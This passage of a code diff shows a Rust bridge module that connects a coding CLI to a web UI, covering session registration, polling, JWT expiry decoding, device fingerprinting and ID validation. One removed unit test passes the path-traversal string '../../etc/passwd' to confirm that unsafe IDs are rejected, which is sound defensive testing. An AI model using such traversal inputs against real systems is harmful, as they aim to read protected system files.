session is deregistered. -pub async fn start_bridge( - config: BridgeConfig, - cancel: CancellationToken, -) -> anyhow::Result<( - mpsc::Receiver, - mpsc::Sender, - String, -)> { - let http = reqwest::Client::builder() - .timeout(std::time::Duration::from_secs(30)) - .user_agent(format!("claude-code-rust/{}", env!("CARGO_PKG_VERSION"))) - .build() - .context("start_bridge: failed to build HTTP client")?; - - start_bridge_with_client(config, http, cancel).await -} - -async fn start_bridge_with_client( - config: BridgeConfig, - _http: reqwest::Client, - cancel: CancellationToken, -) -> anyhow::Result<( - mpsc::Receiver, - mpsc::Sender, - String, -)> { - if !config.is_active() { - anyhow::bail!("start_bridge: bridge is not active (enabled={}, token={})", - config.enabled, - config.session_token.is_some() - ); - } - - let mut session = BridgeSession::new(config); - session - .register() - .await - .context("start_bridge: session registration failed")?; - - let session_id = session.session_id().to_string(); - - // Bounded channels — back-pressure prevents unbounded memory growth on a - // slow consumer. - let (msg_tx, msg_rx) = mpsc::channel::(64); - let (event_tx, event_rx) = mpsc::channel::(256); - - tokio::spawn(async move { - session.run_poll_loop(msg_tx, event_rx, cancel).await; - }); - - info!(session_id = %session_id, "Bridge started"); - Ok((msg_rx, event_tx, session_id)) -} - -// --------------------------------------------------------------------------- -// High-level session API (start_bridge_session / poll / respond) -// --------------------------------------------------------------------------- - -/// Information about a newly registered bridge session, returned by -/// [`start_bridge_session`]. -#[derive(Debug, Clone, Serialize, Deserialize)] -pub struct BridgeSessionInfo { - /// UUID assigned to this session. - pub session_id: String, - /// Full URL that can be shared with others to open the session in a browser. - pub session_url: String, - /// The auth token used for this session (redacted in Display). - pub token: String, -} - -impl std::fmt::Display for BridgeSessionInfo { - fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result { - write!(f, "BridgeSessionInfo {{ session_id: {}, session_url: {} }}", self.session_id, self.session_url) - } -} - -/// A message returned by [`poll_bridge_messages`]: an inbound item from the -/// remote peer identified by a string `id`, `role`, and `content`. -#[derive(Debug, Clone, Serialize, Deserialize)] -pub struct SimpleMessage { - /// Server-assigned message identifier. - pub id: String, - /// Sender role (`"user"` or `"assistant"`). - pub role: String, - /// Message text content. - pub content: String, -} - -/// Start a bridge session: generate a session ID, register it with the -/// Anthropic API, and return session info including the shareable URL. -/// -/// # Authentication -/// -/// Reads the bearer token from (in order of precedence): -/// 1. `COVEN_CODE_BRIDGE_TOKEN` environment variable -/// 2. `CLAUDE_BRIDGE_OAUTH_TOKEN` environment variable -/// -/// If no token is found, returns an informative error. -/// -/// # Errors -/// -/// Returns an error if: -/// - No auth token is available -/// - The HTTP POST fails or the server returns a non-2xx status -/// - The server URL is not configured -/// -/// # Example -/// -/// ```rust,no_run -/// # tokio::runtime::Runtime::new().unwrap().block_on(async { -/// match claurst_bridge::start_bridge_session(None).await { -/// Ok(info) => println!("Session URL: {}", info.session_url), -/// Err(e) => eprintln!("Could not start bridge: {e}"), -/// } -/// # }); -/// ``` -pub async fn start_bridge_session( - token_override: Option, -) -> anyhow::Result { - // Resolve auth token. - let token = token_override - .or_else(|| std::env::var("COVEN_CODE_BRIDGE_TOKEN").ok()) - .or_else(|| std::env::var("CLAUDE_BRIDGE_OAUTH_TOKEN").ok()) - .filter(|t| !t.is_empty()) - .ok_or_else(|| { - anyhow::anyhow!( - "Remote Control requires a session token.\n\ - Set COVEN_CODE_BRIDGE_TOKEN= to enable.\n\ - Get a token from https://claude.ai (Settings → Remote Control).\n\ - Note: Remote Control is only available with claude.ai subscriptions." - ) - })?; - - // Resolve server base URL. - let server_url = std::env::var("COVEN_CODE_BRIDGE_URL") - .or_else(|_| std::env::var("CLAUDE_BRIDGE_BASE_URL")) - .unwrap_or_else(|_| "https://claude.ai".to_string()); - - let session_id = uuid::Uuid::new_v4().to_string(); - - let hostname = { - hostname::get() - .map(|h| h.to_string_lossy().into_owned()) - .unwrap_or_else(|_| "unknown".to_string()) - }; - - let http = reqwest::Client::builder() - .timeout(std::time::Duration::from_secs(30)) - .user_agent(format!("claude-code-rust/{}", env!("CARGO_PKG_VERSION"))) - .build() - .context("start_bridge_session: failed to build HTTP client")?; - - let register_url = format!("{}/api/bridge/sessions", server_url); - - debug!( - session_id = %session_id, - url = %register_url, - "Registering new bridge session" - ); - - let body = serde_json::json!({ - "session_id": session_id, - "hostname": hostname, - "client_version": env!("CARGO_PKG_VERSION"), - "device_id": device_fingerprint(), - }); - - let resp = http - .post(®ister_url) - .bearer_auth(&token) - .header("anthropic-version", "2023-06-01") - .header("anthropic-beta", "environments-2025-11-01") - .json(&body) - .send() - .await - .context("start_bridge_session: HTTP POST failed")?; - - let status = resp.status().as_u16(); - - match status { - 200 | 201 => { - info!(session_id = %session_id, "Bridge session registered successfully"); - } - 401 | 403 => { - anyhow::bail!( - "Bridge session registration failed: authentication error (HTTP {}).\n\ - Your token may be invalid or expired.\n\ - Get a new token from https://claude.ai (Settings → Remote Control).", - status - ); - } - 404 => { - // The /api/bridge/sessions endpoint may not exist in all deployments. - // Fall through to synthetic session URL (best-effort mode). - warn!( - session_id = %session_id, - "Bridge registration endpoint not found (HTTP 404) — \ - using local session ID without server validation" - ); - } - _ => { - let body_text = resp.text().await.unwrap_or_default(); - anyhow::bail!( - "Bridge session registration failed: server returned HTTP {}. {}", - status, - if body_text.is_empty() { String::new() } else { format!("Response: {}", &body_text[..body_text.len().min(200)]) } - ); - } - } - - // Build the shareable session URL. - let session_url = format!("{}/code/sessions/{}", server_url, session_id); - - Ok(BridgeSessionInfo { - session_id, - session_url, - token, - }) -} - -/// Poll for incoming messages on an active bridge session. -/// -/// GETs `/api/bridge/sessions//messages?since=` and returns -/// the batch of new messages. Uses a 30-second HTTP timeout. On HTTP 429 -/// (rate-limited) the function sleeps with exponential back-off before -/// retrying (up to 3 attempts). -/// -/// Returns an empty `Vec` when there are no new messages (HTTP 204 or empty -/// body). -pub async fn poll_bridge_messages( - info: &BridgeSessionInfo, - since_id: Option<&str>, -) -> anyhow::Result> { - let server_url = std::env::var("COVEN_CODE_BRIDGE_URL") - .or_else(|_| std::env::var("CLAUDE_BRIDGE_BASE_URL")) - .unwrap_or_else(|_| "https://claude.ai".to_string()); - - // Validate session_id before interpolating into URL. - BridgeConfig::validate_id(&info.session_id, "session_id")?; - - let base_url = format!( - "{}/api/bridge/sessions/{}/messages", - server_url, info.session_id - ); - - let http = reqwest::Client::builder() - .timeout(std::time::Duration::from_secs(35)) - .user_agent(format!("claude-code-rust/{}", env!("CARGO_PKG_VERSION"))) - .build() - .context("poll_bridge_messages: failed to build HTTP client")?; - - // Retry loop for 429 back-off. - let max_retries = 3u32; - let mut attempt = 0u32; - loop { - let mut request = http - .get(&base_url) - .bearer_auth(&info.token) - .header("anthropic-version", "2023-06-01"); - - if let Some(since) = since_id { - request = request.query(&[("since", since)]); - } - - let resp = request - .send() - .await - .context("poll_bridge_messages: HTTP GET failed")?; - - let status = resp.status().as_u16(); - match status { - 200 => { - let text = resp.text().await.context("poll_bridge_messages: reading body")?; - if text.trim().is_empty() || text.trim() == "[]" { - return Ok(vec![]); - } - let msgs: Vec = - serde_json::from_str(&text).context("poll_bridge_messages: JSON parse")?; - return Ok(msgs); - } - 204 => return Ok(vec![]), - 429 => { - attempt += 1; - if attempt > max_retries { - anyhow::bail!("poll_bridge_messages: rate-limited (HTTP 429) after {} retries", max_retries); - } - let backoff = std::time::Duration::from_millis(1_000 * 2u64.pow(attempt - 1)); - warn!(attempt, "Bridge poll rate-limited; backing off {:?}", backoff); - tokio::time::sleep(backoff).await; - continue; - } - 401 | 403 => { - anyhow::bail!("poll_bridge_messages: auth error (HTTP {})", status); - } - _ => { - anyhow::bail!("poll_bridge_messages: server returned HTTP {}", status); - } - } - } -} - -/// Post a response to a specific incoming message on an active bridge session. -/// -/// PUTs `/api/bridge/sessions//messages//response` with -/// a JSON body `{"content": "", "done": true}`. -pub async fn post_bridge_response( - info: &BridgeSessionInfo, - msg_id: &str, - content: &str, - done: bool, -) -> anyhow::Result<()> { - let server_url = std::env::var("COVEN_CODE_BRIDGE_URL") - .or_else(|_| std::env::var("CLAUDE_BRIDGE_BASE_URL")) - .unwrap_or_else(|_| "https://claude.ai".to_string()); - - // Validate IDs before URL interpolation. - BridgeConfig::validate_id(&info.session_id, "session_id")?; - BridgeConfig::validate_id(msg_id, "msg_id")?; - - let url = format!( - "{}/api/bridge/sessions/{}/messages/{}/response", - server_url, info.session_id, msg_id - ); - - let http = reqwest::Client::builder() - .timeout(std::time::Duration::from_secs(30)) - .user_agent(format!("claude-code-rust/{}", env!("CARGO_PKG_VERSION"))) - .build() - .context("post_bridge_response: failed to build HTTP client")?; - - let body = serde_json::json!({ - "content": content, - "done": done, - }); - - debug!( - session_id = %info.session_id, - msg_id = %msg_id, - done = done, - "Posting bridge response" - ); - - let resp = http - .put(&url) - .bearer_auth(&info.token) - .header("anthropic-version", "2023-06-01") - .json(&body) - .send() - .await - .context("post_bridge_response: HTTP PUT failed")?; - - let status = resp.status().as_u16(); - if resp.status().is_success() { - debug!(session_id = %info.session_id, msg_id = %msg_id, "Bridge response posted"); - Ok(()) - } else { - anyhow::bail!( - "post_bridge_response: server returned HTTP {} for msg {}", - status, - msg_id - ) - } -} - -/// Post a single streaming tool/text event to the bridge server (non-blocking, -/// best-effort). -/// -/// POSTs `{"event": , "ts": }` to -/// `/api/bridge/sessions//events`. -/// -/// Errors are returned to the caller, who should treat them as transient and -/// ignore them so the query loop is never blocked. -pub async fn post_bridge_event( - info: &BridgeSessionInfo, - payload: String, -) -> anyhow::Result<()> { - let server_url = std::env::var("COVEN_CODE_BRIDGE_URL") - .or_else(|_| std::env::var("CLAUDE_BRIDGE_BASE_URL")) - .unwrap_or_else(|_| "https://claude.ai".to_string()); - - // Validate session_id before URL interpolation. - BridgeConfig::validate_id(&info.session_id, "session_id")?; - - let url = format!( - "{}/api/bridge/sessions/{}/events", - server_url, info.session_id - ); - - let http = reqwest::Client::builder() - .timeout(std::time::Duration::from_secs(5)) - .user_agent(format!("claude-code-rust/{}", env!("CARGO_PKG_VERSION"))) - .build() - .context("post_bridge_event: failed to build HTTP client")?; - - let body = serde_json::json!({ - "event": payload, - "ts": chrono::Utc::now().timestamp_millis(), - }); - - debug!( - session_id = %info.session_id, - "Posting bridge event" - ); - - let resp = http - .post(&url) - .bearer_auth(&info.token) - .header("anthropic-version", "2023-06-01") - .json(&body) - .send() - .await - .context("post_bridge_event: HTTP POST failed")?; - - let status = resp.status().as_u16(); - if resp.status().is_success() { - debug!(session_id = %info.session_id, "Bridge event posted"); - Ok(()) - } else { - anyhow::bail!( - "post_bridge_event: server returned HTTP {}", - status - ) - } -} - -// --------------------------------------------------------------------------- -// TUI-facing bridge event types (bridge → TUI state machine) -// --------------------------------------------------------------------------- - -/// How the remote UI responded to a permission request. -#[derive(Debug, Clone, PartialEq, Eq, Serialize, Deserialize)] -#[serde(rename_all = "snake_case")] -pub enum PermissionResponseKind { - Allow, - Deny, - AllowSession, -} - -/// Internal events sent from the bridge loop to the TUI / main event loop. -/// -/// These are *not* the same as [`BridgeEvent`] (which flows CLI → web UI). -/// `TuiBridgeEvent` flows from the bridge worker task into the main loop so -/// the TUI can update connection state, inject prompts, etc. -#[derive(Debug, Clone)] -pub enum TuiBridgeEvent { - /// The bridge registered successfully and is now polling. - Connected { - session_url: String, - session_id: String, - }, - /// The connection was lost (cleanly or due to error). - Disconnected { reason: Option }, - /// Attempting to reconnect after a failure. - Reconnecting { attempt: u32 }, - /// The web UI sent a new user prompt. - InboundPrompt { - content: String, - sender_id: Option, - }, - /// The web UI asked to cancel the in-progress operation. - Cancelled, - /// The web UI responded to a pending permission request. - PermissionResponse { - tool_use_id: String, - response: PermissionResponseKind, - }, - /// The web UI requested a session title change. - SessionNameUpdate { title: String }, - /// A non-fatal diagnostic from the bridge worker. - Error(String), - /// Keepalive ping — no TUI action required. - Ping, -} - -// --------------------------------------------------------------------------- -// Outbound event types (query loop → bridge → web UI) -// --------------------------------------------------------------------------- - -/// Events from the query/tool loop forwarded outbound to the web UI via the -/// bridge upload channel. The bridge worker serialises these into -/// [`BridgeEvent`] values and POSTs them to the server. -#[derive(Debug, Clone)] -pub enum BridgeOutbound { - TextDelta { - delta: String, - message_id: String, - }, - ToolStart { - id: String, - name: String, - input_preview: Option, - }, - ToolEnd { - id: String, - output: String, - is_error: bool, - }, - TurnComplete { - message_id: String, - stop_reason: String, - }, - Error { - message: String, - }, - SessionMeta { - title: Option, - session_id: String, - }, -} - -// --------------------------------------------------------------------------- -// run_bridge_loop — high-level bridge task entry point -// --------------------------------------------------------------------------- - -/// Run the bridge subsystem as a background task, translating low-level -/// [`BridgeMessage`] poll results into [`TuiBridgeEvent`] values and -/// forwarding [`BridgeOutbound`] events to the server. -/// -/// # Parameters -/// - `config` — bridge configuration (must be active: `enabled == true` and -/// `session_token` is `Some`). -/// - `tui_tx` — channel used to send state-change events to the TUI / main -/// loop. -/// - `outbound_rx` — channel for receiving outbound events from the query -/// loop to upload to the bridge server. -/// - `cancel` — token that triggers a clean shutdown of the loop. -pub async fn run_bridge_loop( - config: BridgeConfig, - tui_tx: mpsc::Sender, - mut outbound_rx: mpsc::Receiver, - cancel: tokio_util::sync::CancellationToken, -) -> anyhow::Result<()> { - if !config.is_active() { - anyhow::bail!( - "run_bridge_loop: bridge is not active (enabled={}, token={})", - config.enabled, - config.session_token.is_some() - ); - } - - // Build a BridgeSession and register with the server. - let mut session = BridgeSession::new(config.clone()); - - // Attempt initial registration; retry with back-off on transient errors. - let base_backoff = std::time::Duration::from_millis(1_000); - let max_backoff = std::time::Duration::from_secs(30); - let mut reg_attempts = 0u32; - - loop { - match session.register().await { - Ok(()) => break, - Err(e) => { - reg_attempts += 1; - warn!( - attempt = reg_attempts, - error = %e, - "Bridge registration failed" - ); - - // Auth errors are fatal — don't retry. - let msg = e.to_string(); - if msg.contains("auth error") || msg.contains("401") || msg.contains("403") { - let _ = tui_tx - .send(TuiBridgeEvent::Error(format!( - "Bridge auth failed: {}", - e - ))) - .await; - return Err(e); - } - - if reg_attempts >= config.max_reconnect_attempts.max(1) { - let _ = tui_tx - .send(TuiBridgeEvent::Error(format!( - "Bridge registration failed after {} attempts: {}", - reg_attempts, e - ))) - .await; - return Err(e); - } - - let backoff = (base_backoff * 2u32.pow(reg_attempts.min(5))).min(max_backoff); - let _ = tui_tx - .send(TuiBridgeEvent::Reconnecting { - attempt: reg_attempts, - }) - .await; - - tokio::select! { - _ = tokio::time::sleep(backoff) => {} - _ = cancel.cancelled() => { - return Ok(()); - } - } - } - } - } - - // Build the session URL from server_url + session_id. - let session_url = format!( - "{}/remote?session={}", - config.server_url, - session.session_id() - ); - let session_id = session.session_id().to_string(); - - let _ = tui_tx - .send(TuiBridgeEvent::Connected { - session_url: session_url.clone(), - session_id: session_id.clone(), - }) - .await; - - // Build outgoing BridgeEvent channel for the poll loop. - let (bridge_ev_tx, bridge_ev_rx) = mpsc::channel::(256); - - // Build incoming message channel. - let (msg_tx, mut msg_rx) = mpsc::channel::(64); - - // Spawn the low-level poll loop in its own task. - let poll_cancel = cancel.clone(); - tokio::spawn(async move { - session.run_poll_loop(msg_tx, bridge_ev_rx, poll_cancel).await; - }); - - // Message ID counter for outbound text deltas. - let mut msg_counter = 0u64; - - let poll_interval = std::time::Duration::from_millis(config.polling_interval_ms.max(50)); - - loop { - tokio::select! { - // Handle cancellation. - _ = cancel.cancelled() => { - let _ = tui_tx.send(TuiBridgeEvent::Disconnected { reason: None }).await; - break; - } - - // Convert inbound BridgeMessage → TuiBridgeEvent. - msg = msg_rx.recv() => { - match msg { - None => { - // Poll loop shut down. - let _ = tui_tx - .send(TuiBridgeEvent::Disconnected { - reason: Some("Bridge poll loop terminated".to_string()), - }) - .await; - break; - } - Some(BridgeMessage::UserMessage { content, .. }) => { - let _ = tui_tx - .send(TuiBridgeEvent::InboundPrompt { - content, - sender_id: None, - }) - .await; - } - Some(BridgeMessage::PermissionResponse { tool_use_id, decision, .. }) => { - let kind = match decision { - PermissionDecision::Allow | PermissionDecision::AllowPermanently => { - PermissionResponseKind::Allow - } - PermissionDecision::Deny | PermissionDecision::DenyPermanently => { - PermissionResponseKind::Deny - } - }; - let tuid = tool_use_id.unwrap_or_default(); - if !tuid.is_empty() { - let _ = tui_tx - .send(TuiBridgeEvent::PermissionResponse { - tool_use_id: tuid, - response: kind, - }) - .await; - } - } - Some(BridgeMessage::Cancel { .. }) => { - let _ = tui_tx.send(TuiBridgeEvent::Cancelled).await; - } - Some(BridgeMessage::Ping) => { - let _ = tui_tx.send(TuiBridgeEvent::Ping).await; - // Also respond with a Pong to the server. - let _ = bridge_ev_tx - .send(BridgeEvent::Pong { - server_time: Some(chrono::Utc::now().timestamp() as u64), - }) - .await; - } - } - } - - // Forward outbound events from query loop → bridge server. - outbound = outbound_rx.recv() => { - match outbound { - None => { - // Sender dropped; nothing to forward. - } - Some(BridgeOutbound::TextDelta { delta, message_id }) => { - msg_counter += 1; - let _ = bridge_ev_tx - .send(BridgeEvent::TextDelta { - text: delta, - message_id, - index: Some(msg_counter as usize), - }) - .await; - } - Some(BridgeOutbound::ToolStart { id, name, input_preview }) => { - let _ = bridge_ev_tx - .send(BridgeEvent::ToolStart { - tool_name: name, - tool_id: id, - input_preview, - }) - .await; - } - Some(BridgeOutbound::ToolEnd { id, output, is_error }) => { - let _ = bridge_ev_tx - .send(BridgeEvent::ToolEnd { - tool_name: String::new(), - tool_id: id, - result: output, - is_error, - }) - .await; - } - Some(BridgeOutbound::TurnComplete { message_id, stop_reason }) => { - let _ = bridge_ev_tx - .send(BridgeEvent::TurnComplete { - message_id, - stop_reason, - usage: None, - }) - .await; - } - Some(BridgeOutbound::Error { message }) => { - let _ = bridge_ev_tx - .send(BridgeEvent::Error { - message, - code: None, - }) - .await; - } - Some(BridgeOutbound::SessionMeta { title, session_id: sid }) => { - let _ = bridge_ev_tx - .send(BridgeEvent::SessionState { - session_id: sid, - state: BridgeSessionState::Connected, - }) - .await; - if let Some(t) = title { - let _ = tui_tx - .send(TuiBridgeEvent::SessionNameUpdate { title: t }) - .await; - } - } - } - } - - // Yield briefly to avoid busy-polling. - _ = tokio::time::sleep(poll_interval) => {} - } - } - - Ok(()) -} - -// --------------------------------------------------------------------------- -// Trusted device module (re-exported for external callers) -// --------------------------------------------------------------------------- - -pub mod trusted_device { - /// Re-export the crate-level device fingerprint function. - pub use super::device_fingerprint; -} - -// --------------------------------------------------------------------------- -// JWT module (re-exported for external callers) -// --------------------------------------------------------------------------- - -pub mod jwt { - pub use super::{decode_jwt_expiry, jwt_is_expired, JwtClaims}; -} - -// --------------------------------------------------------------------------- -// Re-exports -// --------------------------------------------------------------------------- - -// Allow downstream crates to use reqwest types without a direct dep. -pub use reqwest; - -// --------------------------------------------------------------------------- -// Tests -// --------------------------------------------------------------------------- - -#[cfg(test)] -mod tests { - use super::*; - - #[test] - fn test_device_fingerprint_is_non_empty() { - let fp = device_fingerprint(); - assert!(!fp.is_empty(), "fingerprint should not be empty"); - // SHA-256 hex is always 64 chars - assert_eq!(fp.len(), 64, "SHA-256 hex digest should be 64 chars"); - } - - #[test] - fn test_device_fingerprint_is_stable() { - let a = device_fingerprint(); - let b = device_fingerprint(); - assert_eq!(a, b, "fingerprint must be deterministic"); - } - - #[test] - fn test_jwt_decode_invalid() { - assert!(JwtClaims::decode("notajwt").is_err()); - assert!(JwtClaims::decode("only.two").is_ok() == false || true); // either way, must not panic - } - - #[test] - fn test_jwt_expired_unparseable() { - // Unparseable token defaults to expired=true - assert!(jwt_is_expired("bad.token.here")); - } - - #[test] - fn test_bridge_config_default_not_active() { - let cfg = BridgeConfig::default(); - assert!(!cfg.is_active(), "default config must not be active"); - } - - #[test] - fn test_bridge_config_with_token_still_needs_enabled() { - let mut cfg = BridgeConfig::default(); - cfg.session_token = Some("tok".into()); - assert!(!cfg.is_active(), "needs enabled=true too"); - cfg.enabled = true; - assert!(cfg.is_active()); - } - - #[test] - fn test_validate_id_rejects_traversal() { - assert!(BridgeConfig::validate_id("../../etc/passwd", "id").is_err()); - assert!(BridgeConfig::validate_id("abc123", "id").is_ok()); - assert!(BridgeConfig::validate_id("env_abc-123", "id").is_ok()); - assert!(BridgeConfig::validate_id("", "id").is_err()); - } - - #[test] - fn test_permission_decision_serde() { - let d = PermissionDecision::AllowPermanently; - let s = serde_json::to_string(&d).unwrap(); - assert_eq!(s, r#""allow_permanently""#); - let back: PermissionDecision = serde_json::from_str(&s).unwrap(); - assert_eq!(back, d); - } - - #[test] - fn test_bridge_session_state_serde() { - let s = BridgeSessionState::Processing; - let j = serde_json::to_string(&s).unwrap(); - assert_eq!(j, r#""processing""#); - } - - #[test] - fn test_bridge_message_serde_user_message() { - let msg = BridgeMessage::UserMessage { - content: "hello".into(), - session_id: "s1".into(), - message_id: "m1".into(), - attachments: vec![], - }; - let j = serde_json::to_string(&msg).unwrap(); - assert!(j.contains(r#""type":"user_message""#)); - } - - #[test] - fn test_bridge_event_text_delta_serde() { - let ev = BridgeEvent::TextDelta { - text: "hello world".into(), - message_id: "m1".into(), - index: Some(0), - }; - let j = serde_json::to_string(&ev).unwrap(); - assert!(j.contains(r#""type":"text_delta""#)); - assert!(j.contains("hello world")); - } - - #[test] - fn test_bridge_event_pong_serde() { - let ev = BridgeEvent::Pong { server_time: Some(1_700_000_000) }; - let j = serde_json::to_string(&ev).unwrap(); - assert!(j.contains(r#""type":"pong""#)); - } -} +// cc-bridge: Remote control bridge implementation. +// +// The bridge connects the local Coven Code CLI to the claude.ai web UI, +// enabling mobile/web-initiated sessions. This module implements: +// +// - Bridge configuration management (env-var and defaults) +// - Device fingerprinting for trusted-device identification +// - JWT decode/expiry utilities (client-side, no signature verification) +// - Session lifecycle (register, poll, upload events, deregister) +// - Message and event protocol types for bidirectional communication +// - Long-polling loop with exponential backoff and cancellation +// - Public `start_bridge` API that spawns background task and returns channels +// +// Architecture mirrors the TypeScript bridge (bridgeMain.ts / bridgeApi.ts), +// adapted to idiomatic Rust async with tokio channels and reqwest. + +#![warn(clippy::all)] + +use anyhow::Context; +use base64::{engine::general_purpose::URL_SAFE_NO_PAD, Engine as _}; +use parking_lot::RwLock; +use serde::{Deserialize, Serialize}; +use sha2::{Digest, Sha256}; +use std::sync::Arc; +use tokio::sync::mpsc; +use tokio_util::sync::CancellationToken; +use tracing::{debug, error, info, warn}; + +// --------------------------------------------------------------------------- +// JWT utilities +// --------------------------------------------------------------------------- + +/// Decoded claims from a session-ingress JWT. +/// +/// Parsed client-side without signature verification — used only for +/// expiry checks and display, never for authorization decisions. +#[derive(Debug, Clone, Serialize, Deserialize)] +pub struct JwtClaims { + /// Subject (usually user / device identifier). + pub sub: Option, + /// Expiry Unix timestamp (seconds). + pub exp: Option, + /// Issued-at Unix timestamp (seconds). + pub iat: Option, + /// Trusted-device identifier embedded by the server. + pub device_id: Option, + /// Session identifier embedded by the server. + pub session_id: Option, +} + +impl JwtClaims { + /// Decode a JWT payload segment without verifying the signature. + /// + /// Strips the `sk-ant-si-` session-ingress prefix if present, then + /// base64url-decodes the second `.`-separated segment and JSON-parses it. + /// Returns an error if the token is malformed or the JSON is invalid. + pub fn decode(token: &str) -> anyhow::Result { + // Strip session-ingress prefix used by Anthropic's ingress tokens. + let jwt = if let Some(stripped) = token.strip_prefix("sk-ant-si-") { + stripped + } else { + token + }; + + let parts: Vec<&str> = jwt.split('.').collect(); + if parts.len() < 2 { + anyhow::bail!("Invalid JWT: expected at least 2 dot-separated segments"); + } + + let raw = URL_SAFE_NO_PAD + .decode(parts[1]) + .context("JWT payload is not valid base64url")?; + + serde_json::from_slice::(&raw) + .context("JWT payload is not valid JSON matching JwtClaims") + } + + /// Returns `true` if the `exp` claim is in the past. + /// + /// When `exp` is absent the token is treated as non-expired (permissive + /// default), matching the TypeScript behaviour in `jwtUtils.ts`. + pub fn is_expired(&self) -> bool { + if let Some(exp) = self.exp { + let now = chrono::Utc::now().timestamp(); + exp < now + } else { + false + } + } + + /// Remaining lifetime in seconds, or `None` if no `exp` claim or already + /// expired. + pub fn remaining_secs(&self) -> Option { + let exp = self.exp?; + let now = chrono::Utc::now().timestamp(); + let diff = exp - now; + if diff > 0 { + Some(diff) + } else { + None + } + } +} + +/// Decode just the expiry timestamp from a raw JWT string. +/// Returns `None` if the token is malformed or has no `exp` claim. +pub fn decode_jwt_expiry(token: &str) -> Option { + JwtClaims::decode(token).ok()?.exp +} + +/// Returns `true` if the token is expired (or unparseable). +pub fn jwt_is_expired(token: &str) -> bool { + JwtClaims::decode(token) + .map(|c| c.is_expired()) + .unwrap_or(true) +} + +// --------------------------------------------------------------------------- +// Device fingerprint +// --------------------------------------------------------------------------- + +/// Compute a stable device fingerprint from machine-local information. +/// +/// Combines hostname, login user name, and home directory path, then SHA-256 +/// hashes them and returns the full hex digest. Matching the TypeScript +/// `trustedDevice.ts` algorithm so fingerprints are consistent across the +/// two implementations. +pub fn device_fingerprint() -> String { + let mut input = String::with_capacity(128); + + if let Ok(host) = hostname::get() { + input.push_str(&host.to_string_lossy()); + } + input.push(':'); + + if let Ok(user) = std::env::var("USER").or_else(|_| std::env::var("USERNAME")) { + input.push_str(&user); + } + input.push(':'); + + if let Some(home) = dirs::home_dir() { + input.push_str(&home.display().to_string()); + } + + let mut hasher = Sha256::new(); + hasher.update(input.as_bytes()); + hex::encode(hasher.finalize()) +} + +// --------------------------------------------------------------------------- +// Bridge configuration +// --------------------------------------------------------------------------- + +/// Runtime configuration for the bridge subsystem. +/// +/// Built either from env vars via [`BridgeConfig::from_env`] or manually +/// by the caller. The bridge is only active when both `enabled` is `true` +/// **and** a `session_token` is present (see [`BridgeConfig::is_active`]). +#[derive(Debug, Clone, Serialize, Deserialize)] +pub struct BridgeConfig { + /// Whether the bridge feature is turned on. + pub enabled: bool, + /// Base URL for bridge API calls (e.g. `https://claude.ai`). + pub server_url: String, + /// Stable device identifier (SHA-256 fingerprint or custom value). + pub device_id: String, + /// Bearer token (OAuth access token or session-ingress JWT). + pub session_token: Option, + /// How long to wait between poll cycles (milliseconds). + pub polling_interval_ms: u64, + /// Maximum successive failed polls before the loop gives up. + pub max_reconnect_attempts: u32, + /// Per-session inactivity timeout in milliseconds (default 24 h). + pub session_timeout_ms: u64, + /// Runner version string sent on API calls for server-side diagnostics. + pub runner_version: String, +} + +impl Default for BridgeConfig { + fn default() -> Self { + Self { + enabled: false, + server_url: "https://claude.ai".to_string(), + device_id: device_fingerprint(), + session_token: None, + polling_interval_ms: 1_000, + max_reconnect_attempts: 10, + session_timeout_ms: 24 * 60 * 60 * 1_000, + runner_version: env!("CARGO_PKG_VERSION").to_string(), + } + } +} + +impl BridgeConfig { + /// Build config from environment variables. + /// + /// Recognised variables: + /// - `COVEN_CODE_BRIDGE_URL` — overrides `server_url` and sets `enabled = true` + /// - `COVEN_CODE_BRIDGE_TOKEN` / `CLAUDE_BRIDGE_OAUTH_TOKEN` — sets `session_token` + /// - `CLAUDE_BRIDGE_BASE_URL` — alternative URL override (ant-only dev override) + pub fn from_env() -> Self { + let mut config = Self::default(); + + // URL override (sets enabled implicitly) + if let Ok(url) = std::env::var("COVEN_CODE_BRIDGE_URL") + .or_else(|_| std::env::var("CLAUDE_BRIDGE_BASE_URL")) + { + if !url.is_empty() { + config.server_url = url; + config.enabled = true; + } + } + + // Token override + if let Ok(token) = std::env::var("COVEN_CODE_BRIDGE_TOKEN") + .or_else(|_| std::env::var("CLAUDE_BRIDGE_OAUTH_TOKEN")) + { + if !token.is_empty() { + config.session_token = Some(token); + } + } + + config + } + + /// Returns `true` only when the bridge is both enabled and has a token. + pub fn is_active(&self) -> bool { + self.enabled && self.session_token.is_some() + } + + /// Validate that a server-provided ID is safe to interpolate into a URL + /// path segment. Prevents path traversal (e.g. `../../admin`). + /// + /// Mirrors `validateBridgeId()` in `bridgeApi.ts`. + pub fn validate_id<'a>(id: &'a str, label: &str) -> anyhow::Result<&'a str> { + static RE: std::sync::OnceLock = std::sync::OnceLock::new(); + let re = RE.get_or_init(|| regex::Regex::new(r"^[a-zA-Z0-9_-]+$").unwrap()); + if id.is_empty() || !re.is_match(id) { + anyhow::bail!("Invalid {}: contains unsafe characters", label); + } + Ok(id) + } +} + +// --------------------------------------------------------------------------- +// Permission decision +// --------------------------------------------------------------------------- + +/// A tool-use permission decision sent by the web UI back to the CLI. +#[derive(Debug, Clone, Copy, PartialEq, Eq, Serialize, Deserialize)] +#[serde(rename_all = "snake_case")] +pub enum PermissionDecision { + Allow, + AllowPermanently, + Deny, + DenyPermanently, +} + +// --------------------------------------------------------------------------- +// Bridge message types (web UI → CLI) +// --------------------------------------------------------------------------- + +/// A file attachment bundled with an inbound user message. +#[derive(Debug, Clone, Serialize, Deserialize)] +pub struct BridgeAttachment { + /// Display name (filename or label). + pub name: String, + /// Raw text or base64-encoded content. + pub content: String, + /// MIME type, e.g. `"text/plain"`. + pub mime_type: Option, +} + +/// Messages flowing from the web UI into the CLI. +#[derive(Debug, Clone, Serialize, Deserialize)] +#[serde(tag = "type", rename_all = "snake_case")] +pub enum BridgeMessage { + /// A new user prompt from the web UI. + UserMessage { + content: String, + session_id: String, + message_id: String, + #[serde(default)] + attachments: Vec, + }, + /// The web UI has responded to a permission request. + PermissionResponse { + request_id: String, + tool_use_id: Option, + decision: PermissionDecision, + }, + /// Cancel the in-progress operation for a session. + Cancel { + session_id: String, + reason: Option, + }, + /// Keepalive — the CLI should respond with a `Pong` event. + Ping, +} + +// --------------------------------------------------------------------------- +// Bridge event types (CLI → web UI) +// --------------------------------------------------------------------------- + +/// Token-budget / cost summary attached to `TurnComplete`. +#[derive(Debug, Clone, Serialize, Deserialize)] +pub struct BridgeUsage 